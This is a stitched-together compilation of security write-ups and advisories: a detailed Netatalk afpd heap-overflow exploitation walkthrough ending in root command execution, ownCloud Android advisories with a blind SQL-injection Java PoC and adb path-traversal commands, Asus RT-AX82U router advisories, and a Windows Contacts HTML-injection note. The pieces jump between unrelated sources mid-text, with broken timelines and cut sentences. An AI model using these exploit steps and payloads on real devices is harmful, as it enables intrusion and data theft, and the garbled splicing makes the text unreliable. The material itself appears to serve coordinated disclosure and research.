static int dsi_peek(DSI *dsi)
In other words, dsi_peek() pauses during a blocked send and may try to read something if possible. This is done in an attempt to avoid potential deadlocks between the client and the server. The good thing is that the reception is buffered:
static int dsi_peek(DSI *dsi)
{
/* ... */
while (1) {
/* ... */
FD_ZERO(&readfds);
FD_ZERO(&writefds);
if (dsi->eof < dsi->end) {
/* space in read buffer */
FD_SET( dsi->socket, &readfds);
} else { /* ... */ }
FD_SET( dsi->socket, &writefds);
/* No timeout: if there's nothing to read nor nothing to write,
* we've got nothing to do at all */
if ((ret = select( maxfd, &readfds, &writefds, NULL, NULL)) <= 0) {
if (ret == -1 && errno == EINTR)
/* we might have been interrupted by out timer, so restart select */
continue;
/* give up */
LOG(log_error, logtype_dsi, "dsi_peek: unexpected select return: %d %s",
ret, ret < 0 ? strerror(errno) : "");
return -1;
}
if (FD_ISSET(dsi->socket, &writefds)) {
/* we can write again */
LOG(log_debug, logtype_dsi, "dsi_peek: can write again");
break;
}
/* Check if there's sth to read, hopefully reading that will unblock the client */
if (FD_ISSET(dsi->socket, &readfds)) {
len = dsi->end - dsi->eof; /* it's ensured above that there's space */
if ((len = recv(dsi->socket, dsi->eof, len, 0)) <= 0) {
if (len == 0) {
LOG(log_error, logtype_dsi, "dsi_peek: EOF");
return -1;
}
LOG(log_error, logtype_dsi, "dsi_peek: read: %s", strerror(errno));
if (errno == EAGAIN)
continue;
return -1;
}
LOG(log_debug, logtype_dsi, "dsi_peek: read %d bytes", len);
dsi->eof += len;
}
}
Here we see that if select() returns with dsi->socket readable but not writable, recv() is called with dsi->eof as the destination. This looks like a way to push more than 64KB of data into the look ahead buffer and later trigger the vulnerability.
One question remains: how to reach dsi_peek()?
Reaching dsi_peek()
While there are multiple ways to get into that function, we focused on the dsi_cmdreply() call path. This function is used to reply to a client request, which happens for most AFP commands. For instance, sending a request with DSIFUNC_CMD and the AFP command 0x14 will trigger a logout attempt, even for an unauthenticated client, and reach the following call stack:
ssize_t dsi_stream_write(DSI *dsi, void *data, const size_t length, int mode)
{
/* ... */
while (written < length) {
len = send(dsi->socket, (uint8_t *) data + written, length - written, flags);
if (len >= 0) {
written += len;
continue;
}
if (errno == EINTR)
continue;
if (errno == EAGAIN || errno == EWOULDBLOCK) {
LOG(log_debug, logtype_dsi, "dsi_stream_write: send: %s", strerror(errno));
if (mode == DSI_NOWAIT && written == 0) {
/* DSI_NOWAIT is used by attention give up in this case. */
written = -1;
goto exit;
}
/* Try to read sth. in order to break up possible deadlock */
if (dsi_peek(dsi) != 0) {
written = -1;
goto exit;
}
/* Now try writing again */
continue;
}
/* ... */
In the above code, we see that in order to reach dsi_peek(), the call to send() has to fail.
Summarizing the objectives and the strategy
So to summarize, in order to push data into the look ahead buffer one can:
1. Send a logout command to reach dsi_cmdreply().
2. In dsi_stream_write(), find a way to make the send() syscall fail.
3. In dsi_peek(), find a way to make select() return only a readable socket.
Getting a remote system to fail at sending data while keeping the stream open is tricky. One funny way to do that is to mess with the TCP networking layer. The overall strategy is to have a custom TCP stack that simulates a network congestion once a logout request is sent, but only in one direction. The idea is that the remote application will think that it cannot send any more data, while it can still receive some.
Because there are a lot of layers involved (the networking card layer, the kernel buffering, the remote TCP congestion avoidance algorithm, the userland stack (?)), it is non-trivial to find the optimal way to achieve these goals. The chosen approach is a mix of two techniques:
- Zeroing the TCP window on the client side, letting the remote end think our buffer is full;
- No longer sending ACK packets for the server replies.
This strategy seems effective enough and the exploit manages to enter the wanted codepath within a few seconds.
Writing a custom TCP stack
To achieve the described strategy we needed to re-implement a TCP networking stack. Because we did not want to get into low-level details, we used scapy [6] and implemented it in Python over raw sockets.

The class RawTCP of the exploit is the result of this development. It is basic and slow, and it does not handle most of the specifics of TCP (such as packet re-ordering and re-transmission). However, because we expect the targeted device to be on the same network without reliability issues, the current implementation is stable enough.
The most noteworthy details of RawTCP are the attribute reply_with_ack, which can be set to 0 to stop sending ACKs, and window, which is used to advertise the current buffer size.
One prerequisite of our exploit is that the attacker's kernel must be «muzzled down» so that it does not try to interpret incoming, unexpected TCP segments. Indeed, the Linux TCP stack is not aware of our shenanigans on the TCP connection, and it will try to kill the connection by sending RST packets.

One can prevent Linux from sending RST packets to the target with an iptables rule like this:
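The exploit's exact rule is not reproduced above; a typical rule of that kind drops any RST the local kernel tries to emit toward the target (the address below is a placeholder for the NAS):

```shell
# Drop outgoing RSTs to the target so the kernel cannot kill the
# connection our userland TCP stack is managing.
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.0.2.10 -j DROP
```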
To sum up, here is how we managed to trigger the bug. The code implementing this is located in the function do_overflow of the exploit:
1. Open a session by sending DSIOpenSession.
2. In bulk, send a lot of DSICommand requests with the logout function 0x14 to force the server into dsi_cmdreply(). From our tests, 3000 commands seem enough for the targeted hardware.
3. Simulate a congestion by advertising a TCP window size of 0 while no longer ACKing the server replies. After a short while the server should be stuck in dsi_peek(), only capable of receiving data.
4. Send a dummy, invalid DSI command with a dsi_len and payload larger than 64KB. This command is received in dsi_peek() and later consumed in dsi_stream_receive() / dsi_stream_read() / buf_read(). In the exploit we use the command id DSIFUNC_MAX+1 to enter the default case of the afp_over_dsi() switch.
5. Send a block of raw data larger than 64KB. This block is also received in dsi_peek() while the server is blocked, but it is consumed in dsi_writeinit(), overflowing dsi->data and the tail of the dsi struct.
6. Start acknowledging the server replies (3000) again by sending ACKs and a proper TCP window size. This triggers the handling of the logout commands queued during the obstruction, then of the invalid command, reaching the overflow.
The whole process is done pretty quickly, in a few seconds depending on the setup (usually less than 15 seconds).
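The DSI framing used throughout these steps can be sketched as follows. This is a simplified builder based on the standard 16-byte DSI header (flags, command, request ID, error/data offset, total data length, reserved); the constants match netatalk's dsi.h, but the helper itself is illustrative, not the exploit's code:

```python
import struct

DSIFUNC_CMD  = 2   # DSICommand
DSIFUNC_OPEN = 4   # DSIOpenSession
DSIFUNC_MAX  = 8   # highest valid DSI command id
AFP_LOGOUT   = 0x14

def dsi_packet(command, request_id, payload, flags=0):
    # 16-byte DSI header followed by the payload; the "total data
    # length" field (dsi_len) is what the server trusts when reading.
    return struct.pack("!BBHIII", flags, command, request_id,
                       0, len(payload), 0) + payload

open_session = dsi_packet(DSIFUNC_OPEN, 1, b"")
logout       = dsi_packet(DSIFUNC_CMD, 2, bytes([AFP_LOGOUT]))
# Step 4: an invalid command id to hit afp_over_dsi()'s default case.
invalid      = dsi_packet(DSIFUNC_MAX + 1, 3, b"A" * 0x11000)
```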
GETTING A LEAK
To exploit the server, we need to know where the main binary (afpd) is loaded in memory. The server runs with Address Space Layout Randomization (ASLR) enabled, therefore the base address of afpd changes each time the server is started. Fortunately for us, afpd forks before handling a client connection, so the base address remains the same across all connections, even if we crash a forked process.

In order to defeat ASLR, we need to leak a pointer to some known memory location in the afpd binary. To obtain this leak, we can use the overflow to corrupt the tail of the dsi struct (after the data buffer) and force the server to send us more data than expected. The command replay cache feature of the server provides a convenient way to do so.
When the server receives the same command twice (same clientID and function), it takes the replay cache code path, which calls dsi_cmdreply() without initializing dsi->datalen. In that case, dsi_cmdreply() will send dsi->datalen bytes of dsi->data back to the client in dsi_stream_send().
This is fortunate because the datalen field is located just after the data buffer in the struct DSI. That means that to control datalen we just need to trigger the overflow with 65536 + 4 bytes (4 being the size of a size_t).
Then, by sending a DSICommand with an already used clientID, we reach a dsi_cmdreply() that sends back the whole dsi->data buffer, the tail of the dsi struct and part of the following heap data. In the dsi struct tail we get some heap pointers such as dsi->buffer, dsi->start, dsi->eof and dsi->end. This is useful because we now know where client-controlled data is stored. In the following heap data, we hope to find pointers into the afpd main image.
From our experiments we found out that, most of the time, by requesting a leak of 2MB+64KB we get parts of the heap where a hash_t structure lies. This structure is very distinct from other data and contains pointers to the hnode_alloc() and hnode_free() functions, which are located in the afpd main image. Therefore, by parsing the received leak, we can look for hash_t patterns and recover the ASLR slide of the main binary. This method is implemented in the exploit in the function parse_leak().
Regrettably this strategy is not 100% reliable, depending on the heap initialization of afpd. There might be non-mapped memory ranges after the dsi struct, crashing the daemon while it tries to send the leak. In that case, the exploit will not work until the device (or daemon) is restarted. Fortunately, this situation seems rare (less than 20% of cases), giving the exploit a fair chance of success.
BUILDING A WRITE PRIMITIVE
Now that we know where the main image and the heap are located in the server's memory, it is possible to use the full potential of the vulnerability and overflow the rest of the struct DSI to reach code execution.

Rewriting dsi->proto_close looks like a promising way to take control of the flow. However, because of the lack of control over the arguments, we chose another exploitation method, one that works equally well on all architectures but requires the ability to write arbitrary data at a chosen location.
The look ahead pointers of the DSI structure are a nice opportunity to achieve a controlled write.
typedef struct DSI {
/* ... */
uint8_t data[DSI_DATASIZ];
size_t datalen, cmdlen; /* beginning of the overflow */
off_t read_count, write_count;
uint32_t flags; /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
int socket; /* AFP session socket */
int serversock; /* listening socket */
/* DSI readahead buffer used for buffered reads in dsi_peek */
size_t dsireadbuf; /* size of the DSI readahead buffer used in dsi_peek() */
char *buffer; /* buffer start */
char *start; /* current buffer head */
char *eof; /* end of currently used buffer */
char *end;
/* ... */
} DSI;
By setting dsi->buffer to the location we want to write to, and dsi->end as the upper bound of the write location, the next command buffered by the server can end up at a controlled address.

One should take care while setting dsi->start and dsi->eof, because they are reset to dsi->buffer after the overflow in dsi_writeinit():
if (dsi->eof > dsi->start) {
/* We have data in the buffer */
bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
memmove(buf, dsi->start, bytes);
dsi->start += bytes; // the overflowed value is changed back here ...
dsi->datasize -= bytes;
if (dsi->start >= dsi->eof)
dsi->start = dsi->eof = dsi->buffer; // ... and there
}
As seen in the snippet, this is only a matter of setting dsi->start greater than dsi->eof during the overflow.
So to get a write primitive one should:
1. Overflow dsi->buffer, dsi->end, dsi->start and dsi->eof according to the write location.
2. Send two commands in the same TCP segment: the first command is just a dummy one, and the second contains the data to write.

Sending two commands here seems odd, but it is necessary to trigger the arbitrary write because of the convoluted reception mechanism of dsi_stream_read().
When receiving the first command, dsi_buffered_stream_read() will skip the non-blocking call to recv() and take the blocking receive path in dsi_stream_read() -> buf_read() -> readt().

The controlled write happens during the reception of the second command. Because the two commands were sent in the same TCP segment, the data of the second one is most likely already available on the socket. Therefore the non-blocking recv() should succeed and write at dsi->eof.
COMMAND EXECUTION
With the ability to write arbitrary data at a chosen location, it is now possible to take control of the remote program. The most obvious location to write to is the preauth_switch array of AFP handlers, redirecting an entry to afprun(). This function is used by the server to launch a shell command, and can even do so with root privileges 🙂
int afprun(int root, char *cmd, int *outfd)
{
pid_t pid;
uid_t uid = geteuid();
gid_t gid = getegid();
/* point our stdout at the file we want output to go into */
if (outfd && ((*outfd = setup_out_fd()) == -1)) {
return -1;
}
/* ... */
if ((pid=fork()) < 0) { /* ... */ }
/* ... */
/* now completely lose our privileges. This is a fairly paranoid
way of doing it, but it does work on all systems that I know of */
if (root) {
become_user_permanently(0, 0);
uid = gid = 0;
}
else {
become_user_permanently(uid, gid);
}
/* ... */
execl("/bin/sh","sh","-c",cmd,NULL);
/* not reached */
exit(82);
return 1;
}
So to get a command executed as root, we transform the call:
As a final optimization, it is even possible to send the last two DSI packets triggering code execution as the last two commands required for the write primitive. This amounts to doing the preauth_switch overwrite and the dsi->commands / dsi->cmdlen setup at the same time. As a matter of fact, mixing both is even easier because of a detail that is not worth explaining in this write-up; the interested reader can refer to the exploit's comments.
PUTTING THINGS TOGETHER
To sum up, here is an overview of the exploitation process:
1. Setting up the connection.
2. Triggering the vulnerability with a 4-byte overflow to rewrite dsi->datalen.
3. Sending a command with a previously used clientID to trigger the leak.
4. Parsing the leak, looking for a hash_t struct that gives pointers into the afpd main image.
5. Closing the old connection and setting up a new connection.
6. Triggering the vulnerability with a larger overflow to rewrite the look ahead buffer pointers of the dsi struct.
During this research we developed a working exploit for the latest version of Netatalk. It uses a single heap overflow vulnerability to bypass all mitigations and obtain command execution as root. On the MyCloud Home, the afpd service was configured to allow guest authentication, but since the bug is reachable prior to authentication, the exploit works even if guest authentication is disabled.
The funkiest part was undoubtedly implementing a custom TCP stack to trigger the bug. This is quite uncommon for a userland, real-life (as in, not CTF) exploit, and we hope it was entertaining for the reader.
Our exploit will be published on GitHub after a short delay. It should work as is on the targeted device. Adapting it to other distributions should only require minor tweaks and is left as an exercise.
Unfortunately, our Pwn2Own entry ended up being a duplicate of the Mofoffensive team's, who targeted another device that shipped an older version of Netatalk. In that previous release the vulnerability was in essence already there, but maybe a little less fun to exploit, as it did not require messing with the network stack.
We would like to thank:
ZDI and Western Digital for their organization of the P2O competition, especially this session considering the number of teams, and for their help setting up an environment for our exploit;
The Netatalk team for the considerable amount of work and effort they put into this Open Source project.
TIMELINE
2022-06-03 — Vulnerability reported to vendor
2023-02-06 — Coordinated public release of advisory
2022-07-26: Issues notified to ownCloud through HackerOne.
2022-08-01: Report receipt acknowledged.
2022-09-07: We request a status update for GHSL-2022-059.
2022-09-08: ownCloud says that they are still working on the fix for GHSL-2022-059.
2022-10-26: We request a status update for GHSL-2022-060.
2022-10-27: ownCloud says that they are still working on the fix for GHSL-2022-060.
2022-11-28: We request another status update for GHSL-2022-059.
2022-11-28: ownCloud says that the fix for GHSL-2022-059 will be published in the next release.
2022-12-12: Version 3.0 is published.
2022-12-20: We verify that version 3.0 fixed GHSL-2022-060.
2022-12-20: We verify that the fix for GHSL-2022-059 was not included in the release. We ask ownCloud about it.
2023-01-31: ownCloud informs us that in 3.0 the filelist database was deprecated (empty, only used for migrations from older versions) and planned to be removed in a future version.
2023-01-31: We answer that, while that would mitigate one of the reported injections, the other one affects the owncloud_database, which is still in use.
All tables in this content provider can be freely interacted with by other apps on the same device. By reviewing the entry points of the content provider for those tables, it can be seen that several user-controlled parameters end up reaching an unsafe SQL method that allows for SQL injection.
The delete method

User input enters the content provider through the three parameters of this method:
There are two databases affected by this vulnerability: filelist and owncloud_database.

Since the tables in filelist are affected by the injections in the insert and update methods, an attacker can use those to insert a crafted row in any table of the database, containing data queried from other tables. After that, the attacker only needs to query the crafted row to obtain the information (see the Resources section for a PoC). That said, all tables are currently exposed legitimately through the content provider itself, so the injections cannot be exploited to obtain any extra data. Nonetheless, if tables that are not accessible through the content provider were added in the future, they could be accessed using these vulnerabilities.
Regarding the tables in owncloud_database, there are two that are not accessible through the content provider: room_master_table and folder_backup. An attacker can exploit the vulnerability in the query method to exfiltrate data from those. Since strictMode is enabled in the query method, the attacker needs to use a blind SQL injection attack to succeed (see the Resources section for a PoC).
In both cases, the impact is information disclosure. Take into account that the tables exposed in the content provider (most of them) are already arbitrarily modifiable by third-party apps, since FileContentProvider is exported and does not require any permissions.
Resources
SQL injection in filelist

The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the filelist database.
By providing a columnName and a tableName to the exploit function, the attacker takes advantage of the issues explained above to:
1. Create a new file entry in FileContentProvider.
2. Exploit the SQL injection in the update method to set the path of the recently created file to the values of columnName in the table tableName.
3. Query the path of the modified file entry to obtain the desired values.
4. Delete the file entry.
For instance, exploit(context, "name", "SQLITE_MASTER WHERE type='table'") would return all the tables in the filelist database.
Blind SQL injection in owncloud_database

The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the owncloud_database database, exploiting the issues mentioned above with a blind SQL injection technique:
package com.example.test;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;
public class OwncloudProviderExploit {
public static String blindExploit(Context ctx) {
String output = "";
String chars = "abcdefghijklmnopqrstuvwxyz0123456789";
while (true) {
int outputLength = output.length();
for (int i = 0; i < chars.length(); i++) {
char candidate = chars.charAt(i);
String attempt = String.format("%s%c%s", output, candidate, "%");
try (Cursor mCursor = ctx.getContentResolver().query(
Uri.parse("content://org.owncloud/shares"),
null,
"'a'=? AND (SELECT identity_hash FROM room_master_table) LIKE '" + attempt + "'",
new String[]{"a"}, null)) {
if (mCursor == null) {
Log.e("ProviderHelper", "mCursor is null");
return "0";
}
if (mCursor.getCount() > 0) {
output += candidate;
Log.i("evil", output);
break;
}
}
}
if (output.length() == outputLength)
break;
}
return output;
}
}
Issue 2: Insufficient path validation in ReceiveExternalFilesActivity.java (GHSL-2022-060)
Access to arbitrary files in the app's internal storage (fix bypass)

ReceiveExternalFilesActivity handles the upload of files provided by third-party components on the device. The received data can be set arbitrarily by attackers, causing some functions that handle file paths to behave unexpectedly. https://hackerone.com/reports/377107 shows how this could be exploited in the past, using the "android.intent.extra.STREAM" extra to force the application to upload its internal files.

With those payloads, the original issue can still be exploited with the same impact.
Write of arbitrary .txt files in the app's internal storage

Additionally, there is another insufficient path validation issue when uploading a plain text file, which allows writing arbitrary files into the app's internal storage.

When uploading a plain text file, the following code is executed using the user-provided text. It can be seen that the plain text file is momentarily saved in the app's cache, but the destination path is built using the user-provided fileName:
ReceiveExternalFilesActivity:983
private Uri savePlainTextToFile(String fileName) {
Uri uri = null;
String content = getIntent().getStringExtra(Intent.EXTRA_TEXT);
try {
File tmpFile = new File(getCacheDir(), fileName); // here
FileOutputStream outputStream = new FileOutputStream(tmpFile);
outputStream.write(content.getBytes());
outputStream.close();
uri = Uri.fromFile(tmpFile);
} catch (IOException e) {
Timber.w(e, "Failed to create temp file for uploading plain text: %s", e.getMessage());
}
return uri;
}
An attacker can exploit this using a path traversal attack to write arbitrary text files into the app's internal storage or other restricted directories accessible to it. The only restriction is that the file will always have the .txt extension, limiting the impact.
Impact
These issues may lead to information disclosure when uploading the app's internal files, and to arbitrary file writes when uploading plain text files (although limited by the .txt extension).
Resources
The following PoC demonstrates how to upload arbitrary files from the app’s internal storage:
adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "file:///data/user/0/com.owncloud.android.debug/cache/../shared_prefs/com.owncloud.android.debug_preferences.xml"
The following PoC demonstrates how to upload arbitrary files from the app’s internal
files
directory:
adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "content://org.owncloud.files/files/owncloud/logs/owncloud.2022-07-25.log"
The following PoC demonstrates how to write an arbitrary
test.txt
text file to the app’s internal storage:
adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --es "android.intent.extra.TEXT" "Arbitrary contents here" --es "android.intent.extra.TITLE" "../shared_prefs/test"
An authentication bypass vulnerability exists in the get_IFTTTtoken.cgi functionality of the Asus RT-AX82U 3.0.0.4.386_49674-ge182230. A specially-crafted HTTP request can lead to full administrative access to the device. An attacker would need to send a series of HTTP requests to exploit this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via an HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IoT style.
In order to enable remote management and monitoring of our Asus router, so that it behaves just like any other IoT device, there are a couple of settings changes that need to be made. First we must enable WAN access for the HTTPS server (or else nothing could manage the router), and then we must generate an access code to link our device with either Amazon Alexa or IFTTT. These options can all be found internally at

As a high-level overview, upon receiving this code, the remote website will connect to your router at the get_IFTTTtoken.cgi web page and provide a shortToken HTTP query parameter. Assuming this token is received within 2 minutes of the aforementioned access code being generated, and also assuming it matches what's in the router's nvram, the router will respond with an ifttt_token that grants full administrative capabilities over the device, just like the normal token used after logging into the device via the HTTP server.
At [1], the function pulls out the "User-Agent" header of our HTTP GET request and checks whether it starts with "asusrouter". It also checks whether the text after the second dash is either "IFTTT" or "Alexa". In either of those cases it returns 4 or 5, and we are allowed to proceed down the code path. At [2], the function pulls out the shortToken query parameter from our HTTP GET request and passes it into the gen_IFTTTtoken function at [3]. Assuming there is a match, gen_IFTTTtoken will output the ifttt_token authentication buffer to var_30, which is then sent back to the HTTP sender at [4]. Looking at gen_IFTTTtoken:
With the unimportant code cut out, we are left with a somewhat clear view of the generation process. At [8] a random number is generated and reduced modulo 0xFF. This number is then transformed into a binary string of length 8 (e.g. '00101011'). A lot further down at [9], this randbinstrptr is converted back to an integer and fed into a call to snprintf(&ifttt_token, 0x80, "%o", ...), which generates the octal version of our original number. With this in mind, we can clearly see that the keyspace for the ifttt_stoken is only 255 possibilities, which makes brute forcing the ifttt_stoken a trivial matter. While normally this would not be a problem, since the ifttt_stoken can only be used for two minutes after generation, a flaw appears in this scheme if we take a look at the ifttt_timestamp's creation. At [10] we can clearly see that it is the device's uptime at the moment of generation.
We can see that the current uptime is checked against the uptime recorded when the token was generated. Unfortunately for the device, uptime starts from when the device was booted, so if the device ever restarts or reboots for any reason, the ifttt_stoken suddenly becomes valid again, since the current uptime will most likely be less than the uptime() value recorded at the point of ifttt_stoken generation. Neither the ifttt_timestamp nor the ifttt_stoken is ever cleared from nvram, even if the Amazon Alexa and IFTTT settings are disabled, so the device remains vulnerable from the moment the configuration is first generated.
Asus RT-AX82U cfg_server cm_processREQ_NC information disclosure vulnerability
An information disclosure vulnerability exists in the cm_processREQ_NC opcode of the Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router's configuration service. A specially-crafted network packet can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.
The cfg_server and cfg_client binaries on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the cfg_server binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP and UDP ports have different opcodes but, for our purposes, we are only dealing with the TCP opcodes, which look like this:
field, not the rest of the headers. Regardless, this particular request is responded to with the server's public RSA key. This RSA key is needed in order to send a valid cm_processREQ_NC [2] packet, which is where our bug is. The cm_processREQ_NC request is a bit complex, but its structure is given below:
Trimming out all the error cases, we start from where the server begins reading the bytes decrypted with its RSA private key. All the fields have their endianness reversed, and the sub-request type is checked at [8]. A size check at [9] prevents us from doing anything silly with the length field in our master_key message, and a CRC check occurs at [10]. Finally, the sess_block->master_key allocation occurs at [11], with a size provided by our packet.

Now, an important fact about AES encryption is that the key always has a fixed size; for AES-256, our key needs to be 0x20 bytes. As noted above, however, there is no explicit length check to make sure the provided master_key is 0x20 bytes. Thus, if we provide a master_key that is, say, 0x4 bytes, a malloc, memset and memcpy of size 0x4 will occur.
aes_encrypt will read 0x20 bytes from the start of our master_key’s heap allocation, resulting in an out-of-bounds read, with assorted heap data being included in the AES key that encrypts the response. While not exactly a straightforward leak, we can slowly oracle these bytes out. Since we know what the last bytes of the response should be (the client_nonce that we provide), we can simply give a master_key that’s 0x1F bytes, and then brute-force the last byte locally, trying to decrypt the response with each of the 0x100 possibilities until we get one that decrypts correctly. Once we know the last byte, we can move on to the second-to-last byte, and so on and so forth, until we get useful data.
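The byte-by-byte oracle can be sketched in Python. Since the cipher itself isn’t the interesting part, the sketch below stands in a toy SHA-256 XOR keystream for AES-256 — the key-padding and guessing logic is what matters. The server model, HEAP and NONCE values, and the leak/server_encrypt helpers are all hypothetical, not Talos’s actual exploit code:

```python
import hashlib, os

HEAP = os.urandom(8)            # secret heap bytes adjacent to the allocation
NONCE = b"client_nonce_value"   # plaintext tail the attacker knows

def keystream(key, n):
    # toy stand-in for AES-256: SHA-256-based XOR keystream (NOT the real cipher)
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "little")).digest()
        ctr += 1
    return out[:n]

def server_encrypt(master_key):
    # server pads the short master_key with whatever follows it on the heap
    key = master_key + HEAP[:32 - len(master_key)]
    return bytes(a ^ b for a, b in zip(NONCE, keystream(key, len(NONCE))))

def leak(n_bytes):
    known = b""
    for i in range(n_bytes):
        ours = bytes(31 - i)                     # 0x1F, 0x1E, ... zero bytes
        ct = server_encrypt(ours)
        for guess in range(256):
            key = ours + known + bytes([guess])
            pt = bytes(a ^ b for a, b in zip(ct, keystream(key, len(ct))))
            if pt == NONCE:                      # correct decryption -> correct byte
                known += bytes([guess])
                break
    return known

print(leak(4) == HEAP[:4])  # True
```

Each round shortens our master_key by one byte, so exactly one additional unknown heap byte enters the key, which keeps the local brute force at 256 attempts per byte.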
While the malloc that occurs can go into a different bucket based on the size of our provided master_key, heuristically it seems that the same heap chunk is returned for a master_key of less than 0x1E bytes, while a different chunk is returned if the key is 0x1E or 0x1F bytes long. If we thus give a key of 0x1D bytes, we have to brute-force 3 bytes at once, which takes a little longer but is still doable. After that we can go byte-by-byte again and leak important information such as thread stack addresses.
A denial of service vulnerability exists in the cfg_server cm_processConnDiagPktList opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
The cfg_server and cfg_client binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the cfg_server binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP and UDP ports have different opcodes, but for our sake, we’re only dealing with a particular set of ConnDiag opcodes, which look like this:
At [1], the server reads in 0x7ff bytes from its UDP port 7788, and at [2] and [3] the data is then copied from the stack over to a cleared-out heap allocation of size 0x824. Assuming the first four bytes of the input packet are “\x00\x00\x00\x06”, the packet gets added to a particular linked-list structure, the connDiagUdpList. Before we continue on, though, it’s appropriate to list out the structure of the input packet:
At [5], the actual length of the input packet minus twelve is compared against the length field inside the packet itself [6]. Assuming they match, the CRC — another field provided in the packet itself — is then checked. A flaw is present in this function, however: a check that can be seen in both the TCP and UDP handlers is missing from this code path, namely verifying that the size of the received packet is >= 0xC bytes. Thus, if a packet shorter than 0xC bytes is received, the dlenle field at [5] underflows to somewhere between 0xFFFFFFFC and 0xFFFFFFFF. The check against the length field [6] can be easily bypassed by simply putting the underflowed length inside the packet. The CRC check at [7] isn’t an issue, since if the bufsize parameter is less than zero, the CRC calculation is automatically skipped. Since a skipped CRC results in a return value of 0x0, we need to make sure that the crc field is “\x00\x00\x00\x00”. Conveniently, this is already handled for us if our packet is only 8 bytes long, since the buffer the packet lives in was memset to 0x0 beforehand.
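The checks above can be illustrated with a short sketch. The 12-byte header layout (4-byte type, 4-byte length, 4-byte CRC) and the little-endian length are assumptions inferred from the dlenle field described in the advisory, not a dump of the real wire format:

```python
import struct

sent_len = 8                             # we only send 8 bytes in total
dlen = (sent_len - 12) & 0xFFFFFFFF      # 8 - 12 underflows to 0xFFFFFFFC

pkt = b"\x00\x00\x00\x06"                # type: gets added to connDiagUdpList
pkt += struct.pack("<I", dlen)           # length field matches the underflowed value
# the 4-byte crc field is never sent: the server's memset-zeroed buffer
# supplies the required "\x00\x00\x00\x00" for us
```

Sending this 8-byte datagram to UDP 7788 would pass the length and CRC checks under the assumed layout.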
While we can pass all the above checks with an 8-byte packet, it does prevent us from having any control over what occurs after. We end up hitting
This is the story of another forgotten 0-day, fully disclosed more than four years ago by John Page (aka hyp3rlinx). To understand the report, bear in mind that I’m stupid 🙂 My stupidity drives me to take longer paths to solve simple problems, but it also leads me to figure out other ways to exploit some bugs. Why do I say this? Because I was unable to quickly understand that the way to create a .contact file is simply to browse to the Contacts folder and create the contact there; instead, I used this info to first create a VCF file, and then wrongly thought that this was some kind of variant. That was also because my brain couldn’t accept that some 0-days stay forgotten for so long ¯\(ツ)/¯ Once that was done, and after the «wontfix» replies from MSRC and ZDI, further investigation was made to increase the severity, finally reaching .contact files and the Windows «ldap» URL protocol handler.
Details
Vendor: Microsoft.
App: Microsoft Windows Contacts.
Version: 10.0.19044.1826.
Tested systems: Windows 10 & Windows 11.
Tested system versions: Microsoft Windows [Version 10.0.19044.1826] & Microsoft Windows [Version 10.0.22000.795]
Intro
It started while I was reading the exploit code for this vulnerability, which was actually released as a 0-day; ZDI’s report is also available.
Update 2022/07/21: After reporting this case to MS, MSRC’s folks rightly pointed out to me that Windows Contacts isn’t the default program for opening VCF files.
Further research still demonstrates that the default program for VCF files on Win7 ESU & WinServer2019 is Windows Contacts (wab.exe); otherwise MS People (PeopleApp.exe) is used. Here is a full table of this testing:
Windows 7: Default program for VCF files is Windows Contacts (wab.exe).
Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).
Windows 10: Default program for VCF files is MS People (PeopleApp.exe).
Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).
Windows 11: Default program for VCF files is MS People (PeopleApp.exe).
Anyway, they still argue that there’s some social engineering involved — such as opening a crafted VCF file and clicking on some links — so the bug doesn’t meet the MSRC bar for a security update.
Update 2022/07/25: Well, after further research, it’s the same bug. I’ve finally been able to produce a .contact proof of concept. It’s actually possible to get a .contact file parsed correctly using HTML entities. Note this solves the previous issue (Update 2022/07/21), and this file format (.contact) is opened by Windows Contacts, the default program for this file extension, even when MS Office is installed on the system. It just needs an initial file association if one hasn’t been made yet, but the only program installed by default that can handle it is Windows Contacts.
Update 2022/07/25: This further research got me to a point I had been trying to reach for some time: using a URL protocol handler to automatically open crafted contact data and exploit the bug. I finally got it working thanks to the ldap URI scheme, which is associated by default with the Windows Contacts application. By setting up a rogue LDAP server and serving the payload data in the mail, url or wwwhomepage attributes, the impact is increased: it’s no longer necessary to double-click a malicious VCF/contact file, as we can deliver the payload via URL protocols.
The report is basically the same as in the links above, but I’ve improved the social engineering involved a bit. In fact, the first thing I did was improve how the links look: just as if it were an XSS vulnerability, this is actually HTML injection, so it’s possible to close the first anchor element and insert a new one. Then I wanted to hide those HTML elements, and setting as long an «innerHTML» as possible is enough to push them out of view (because there are character limits).
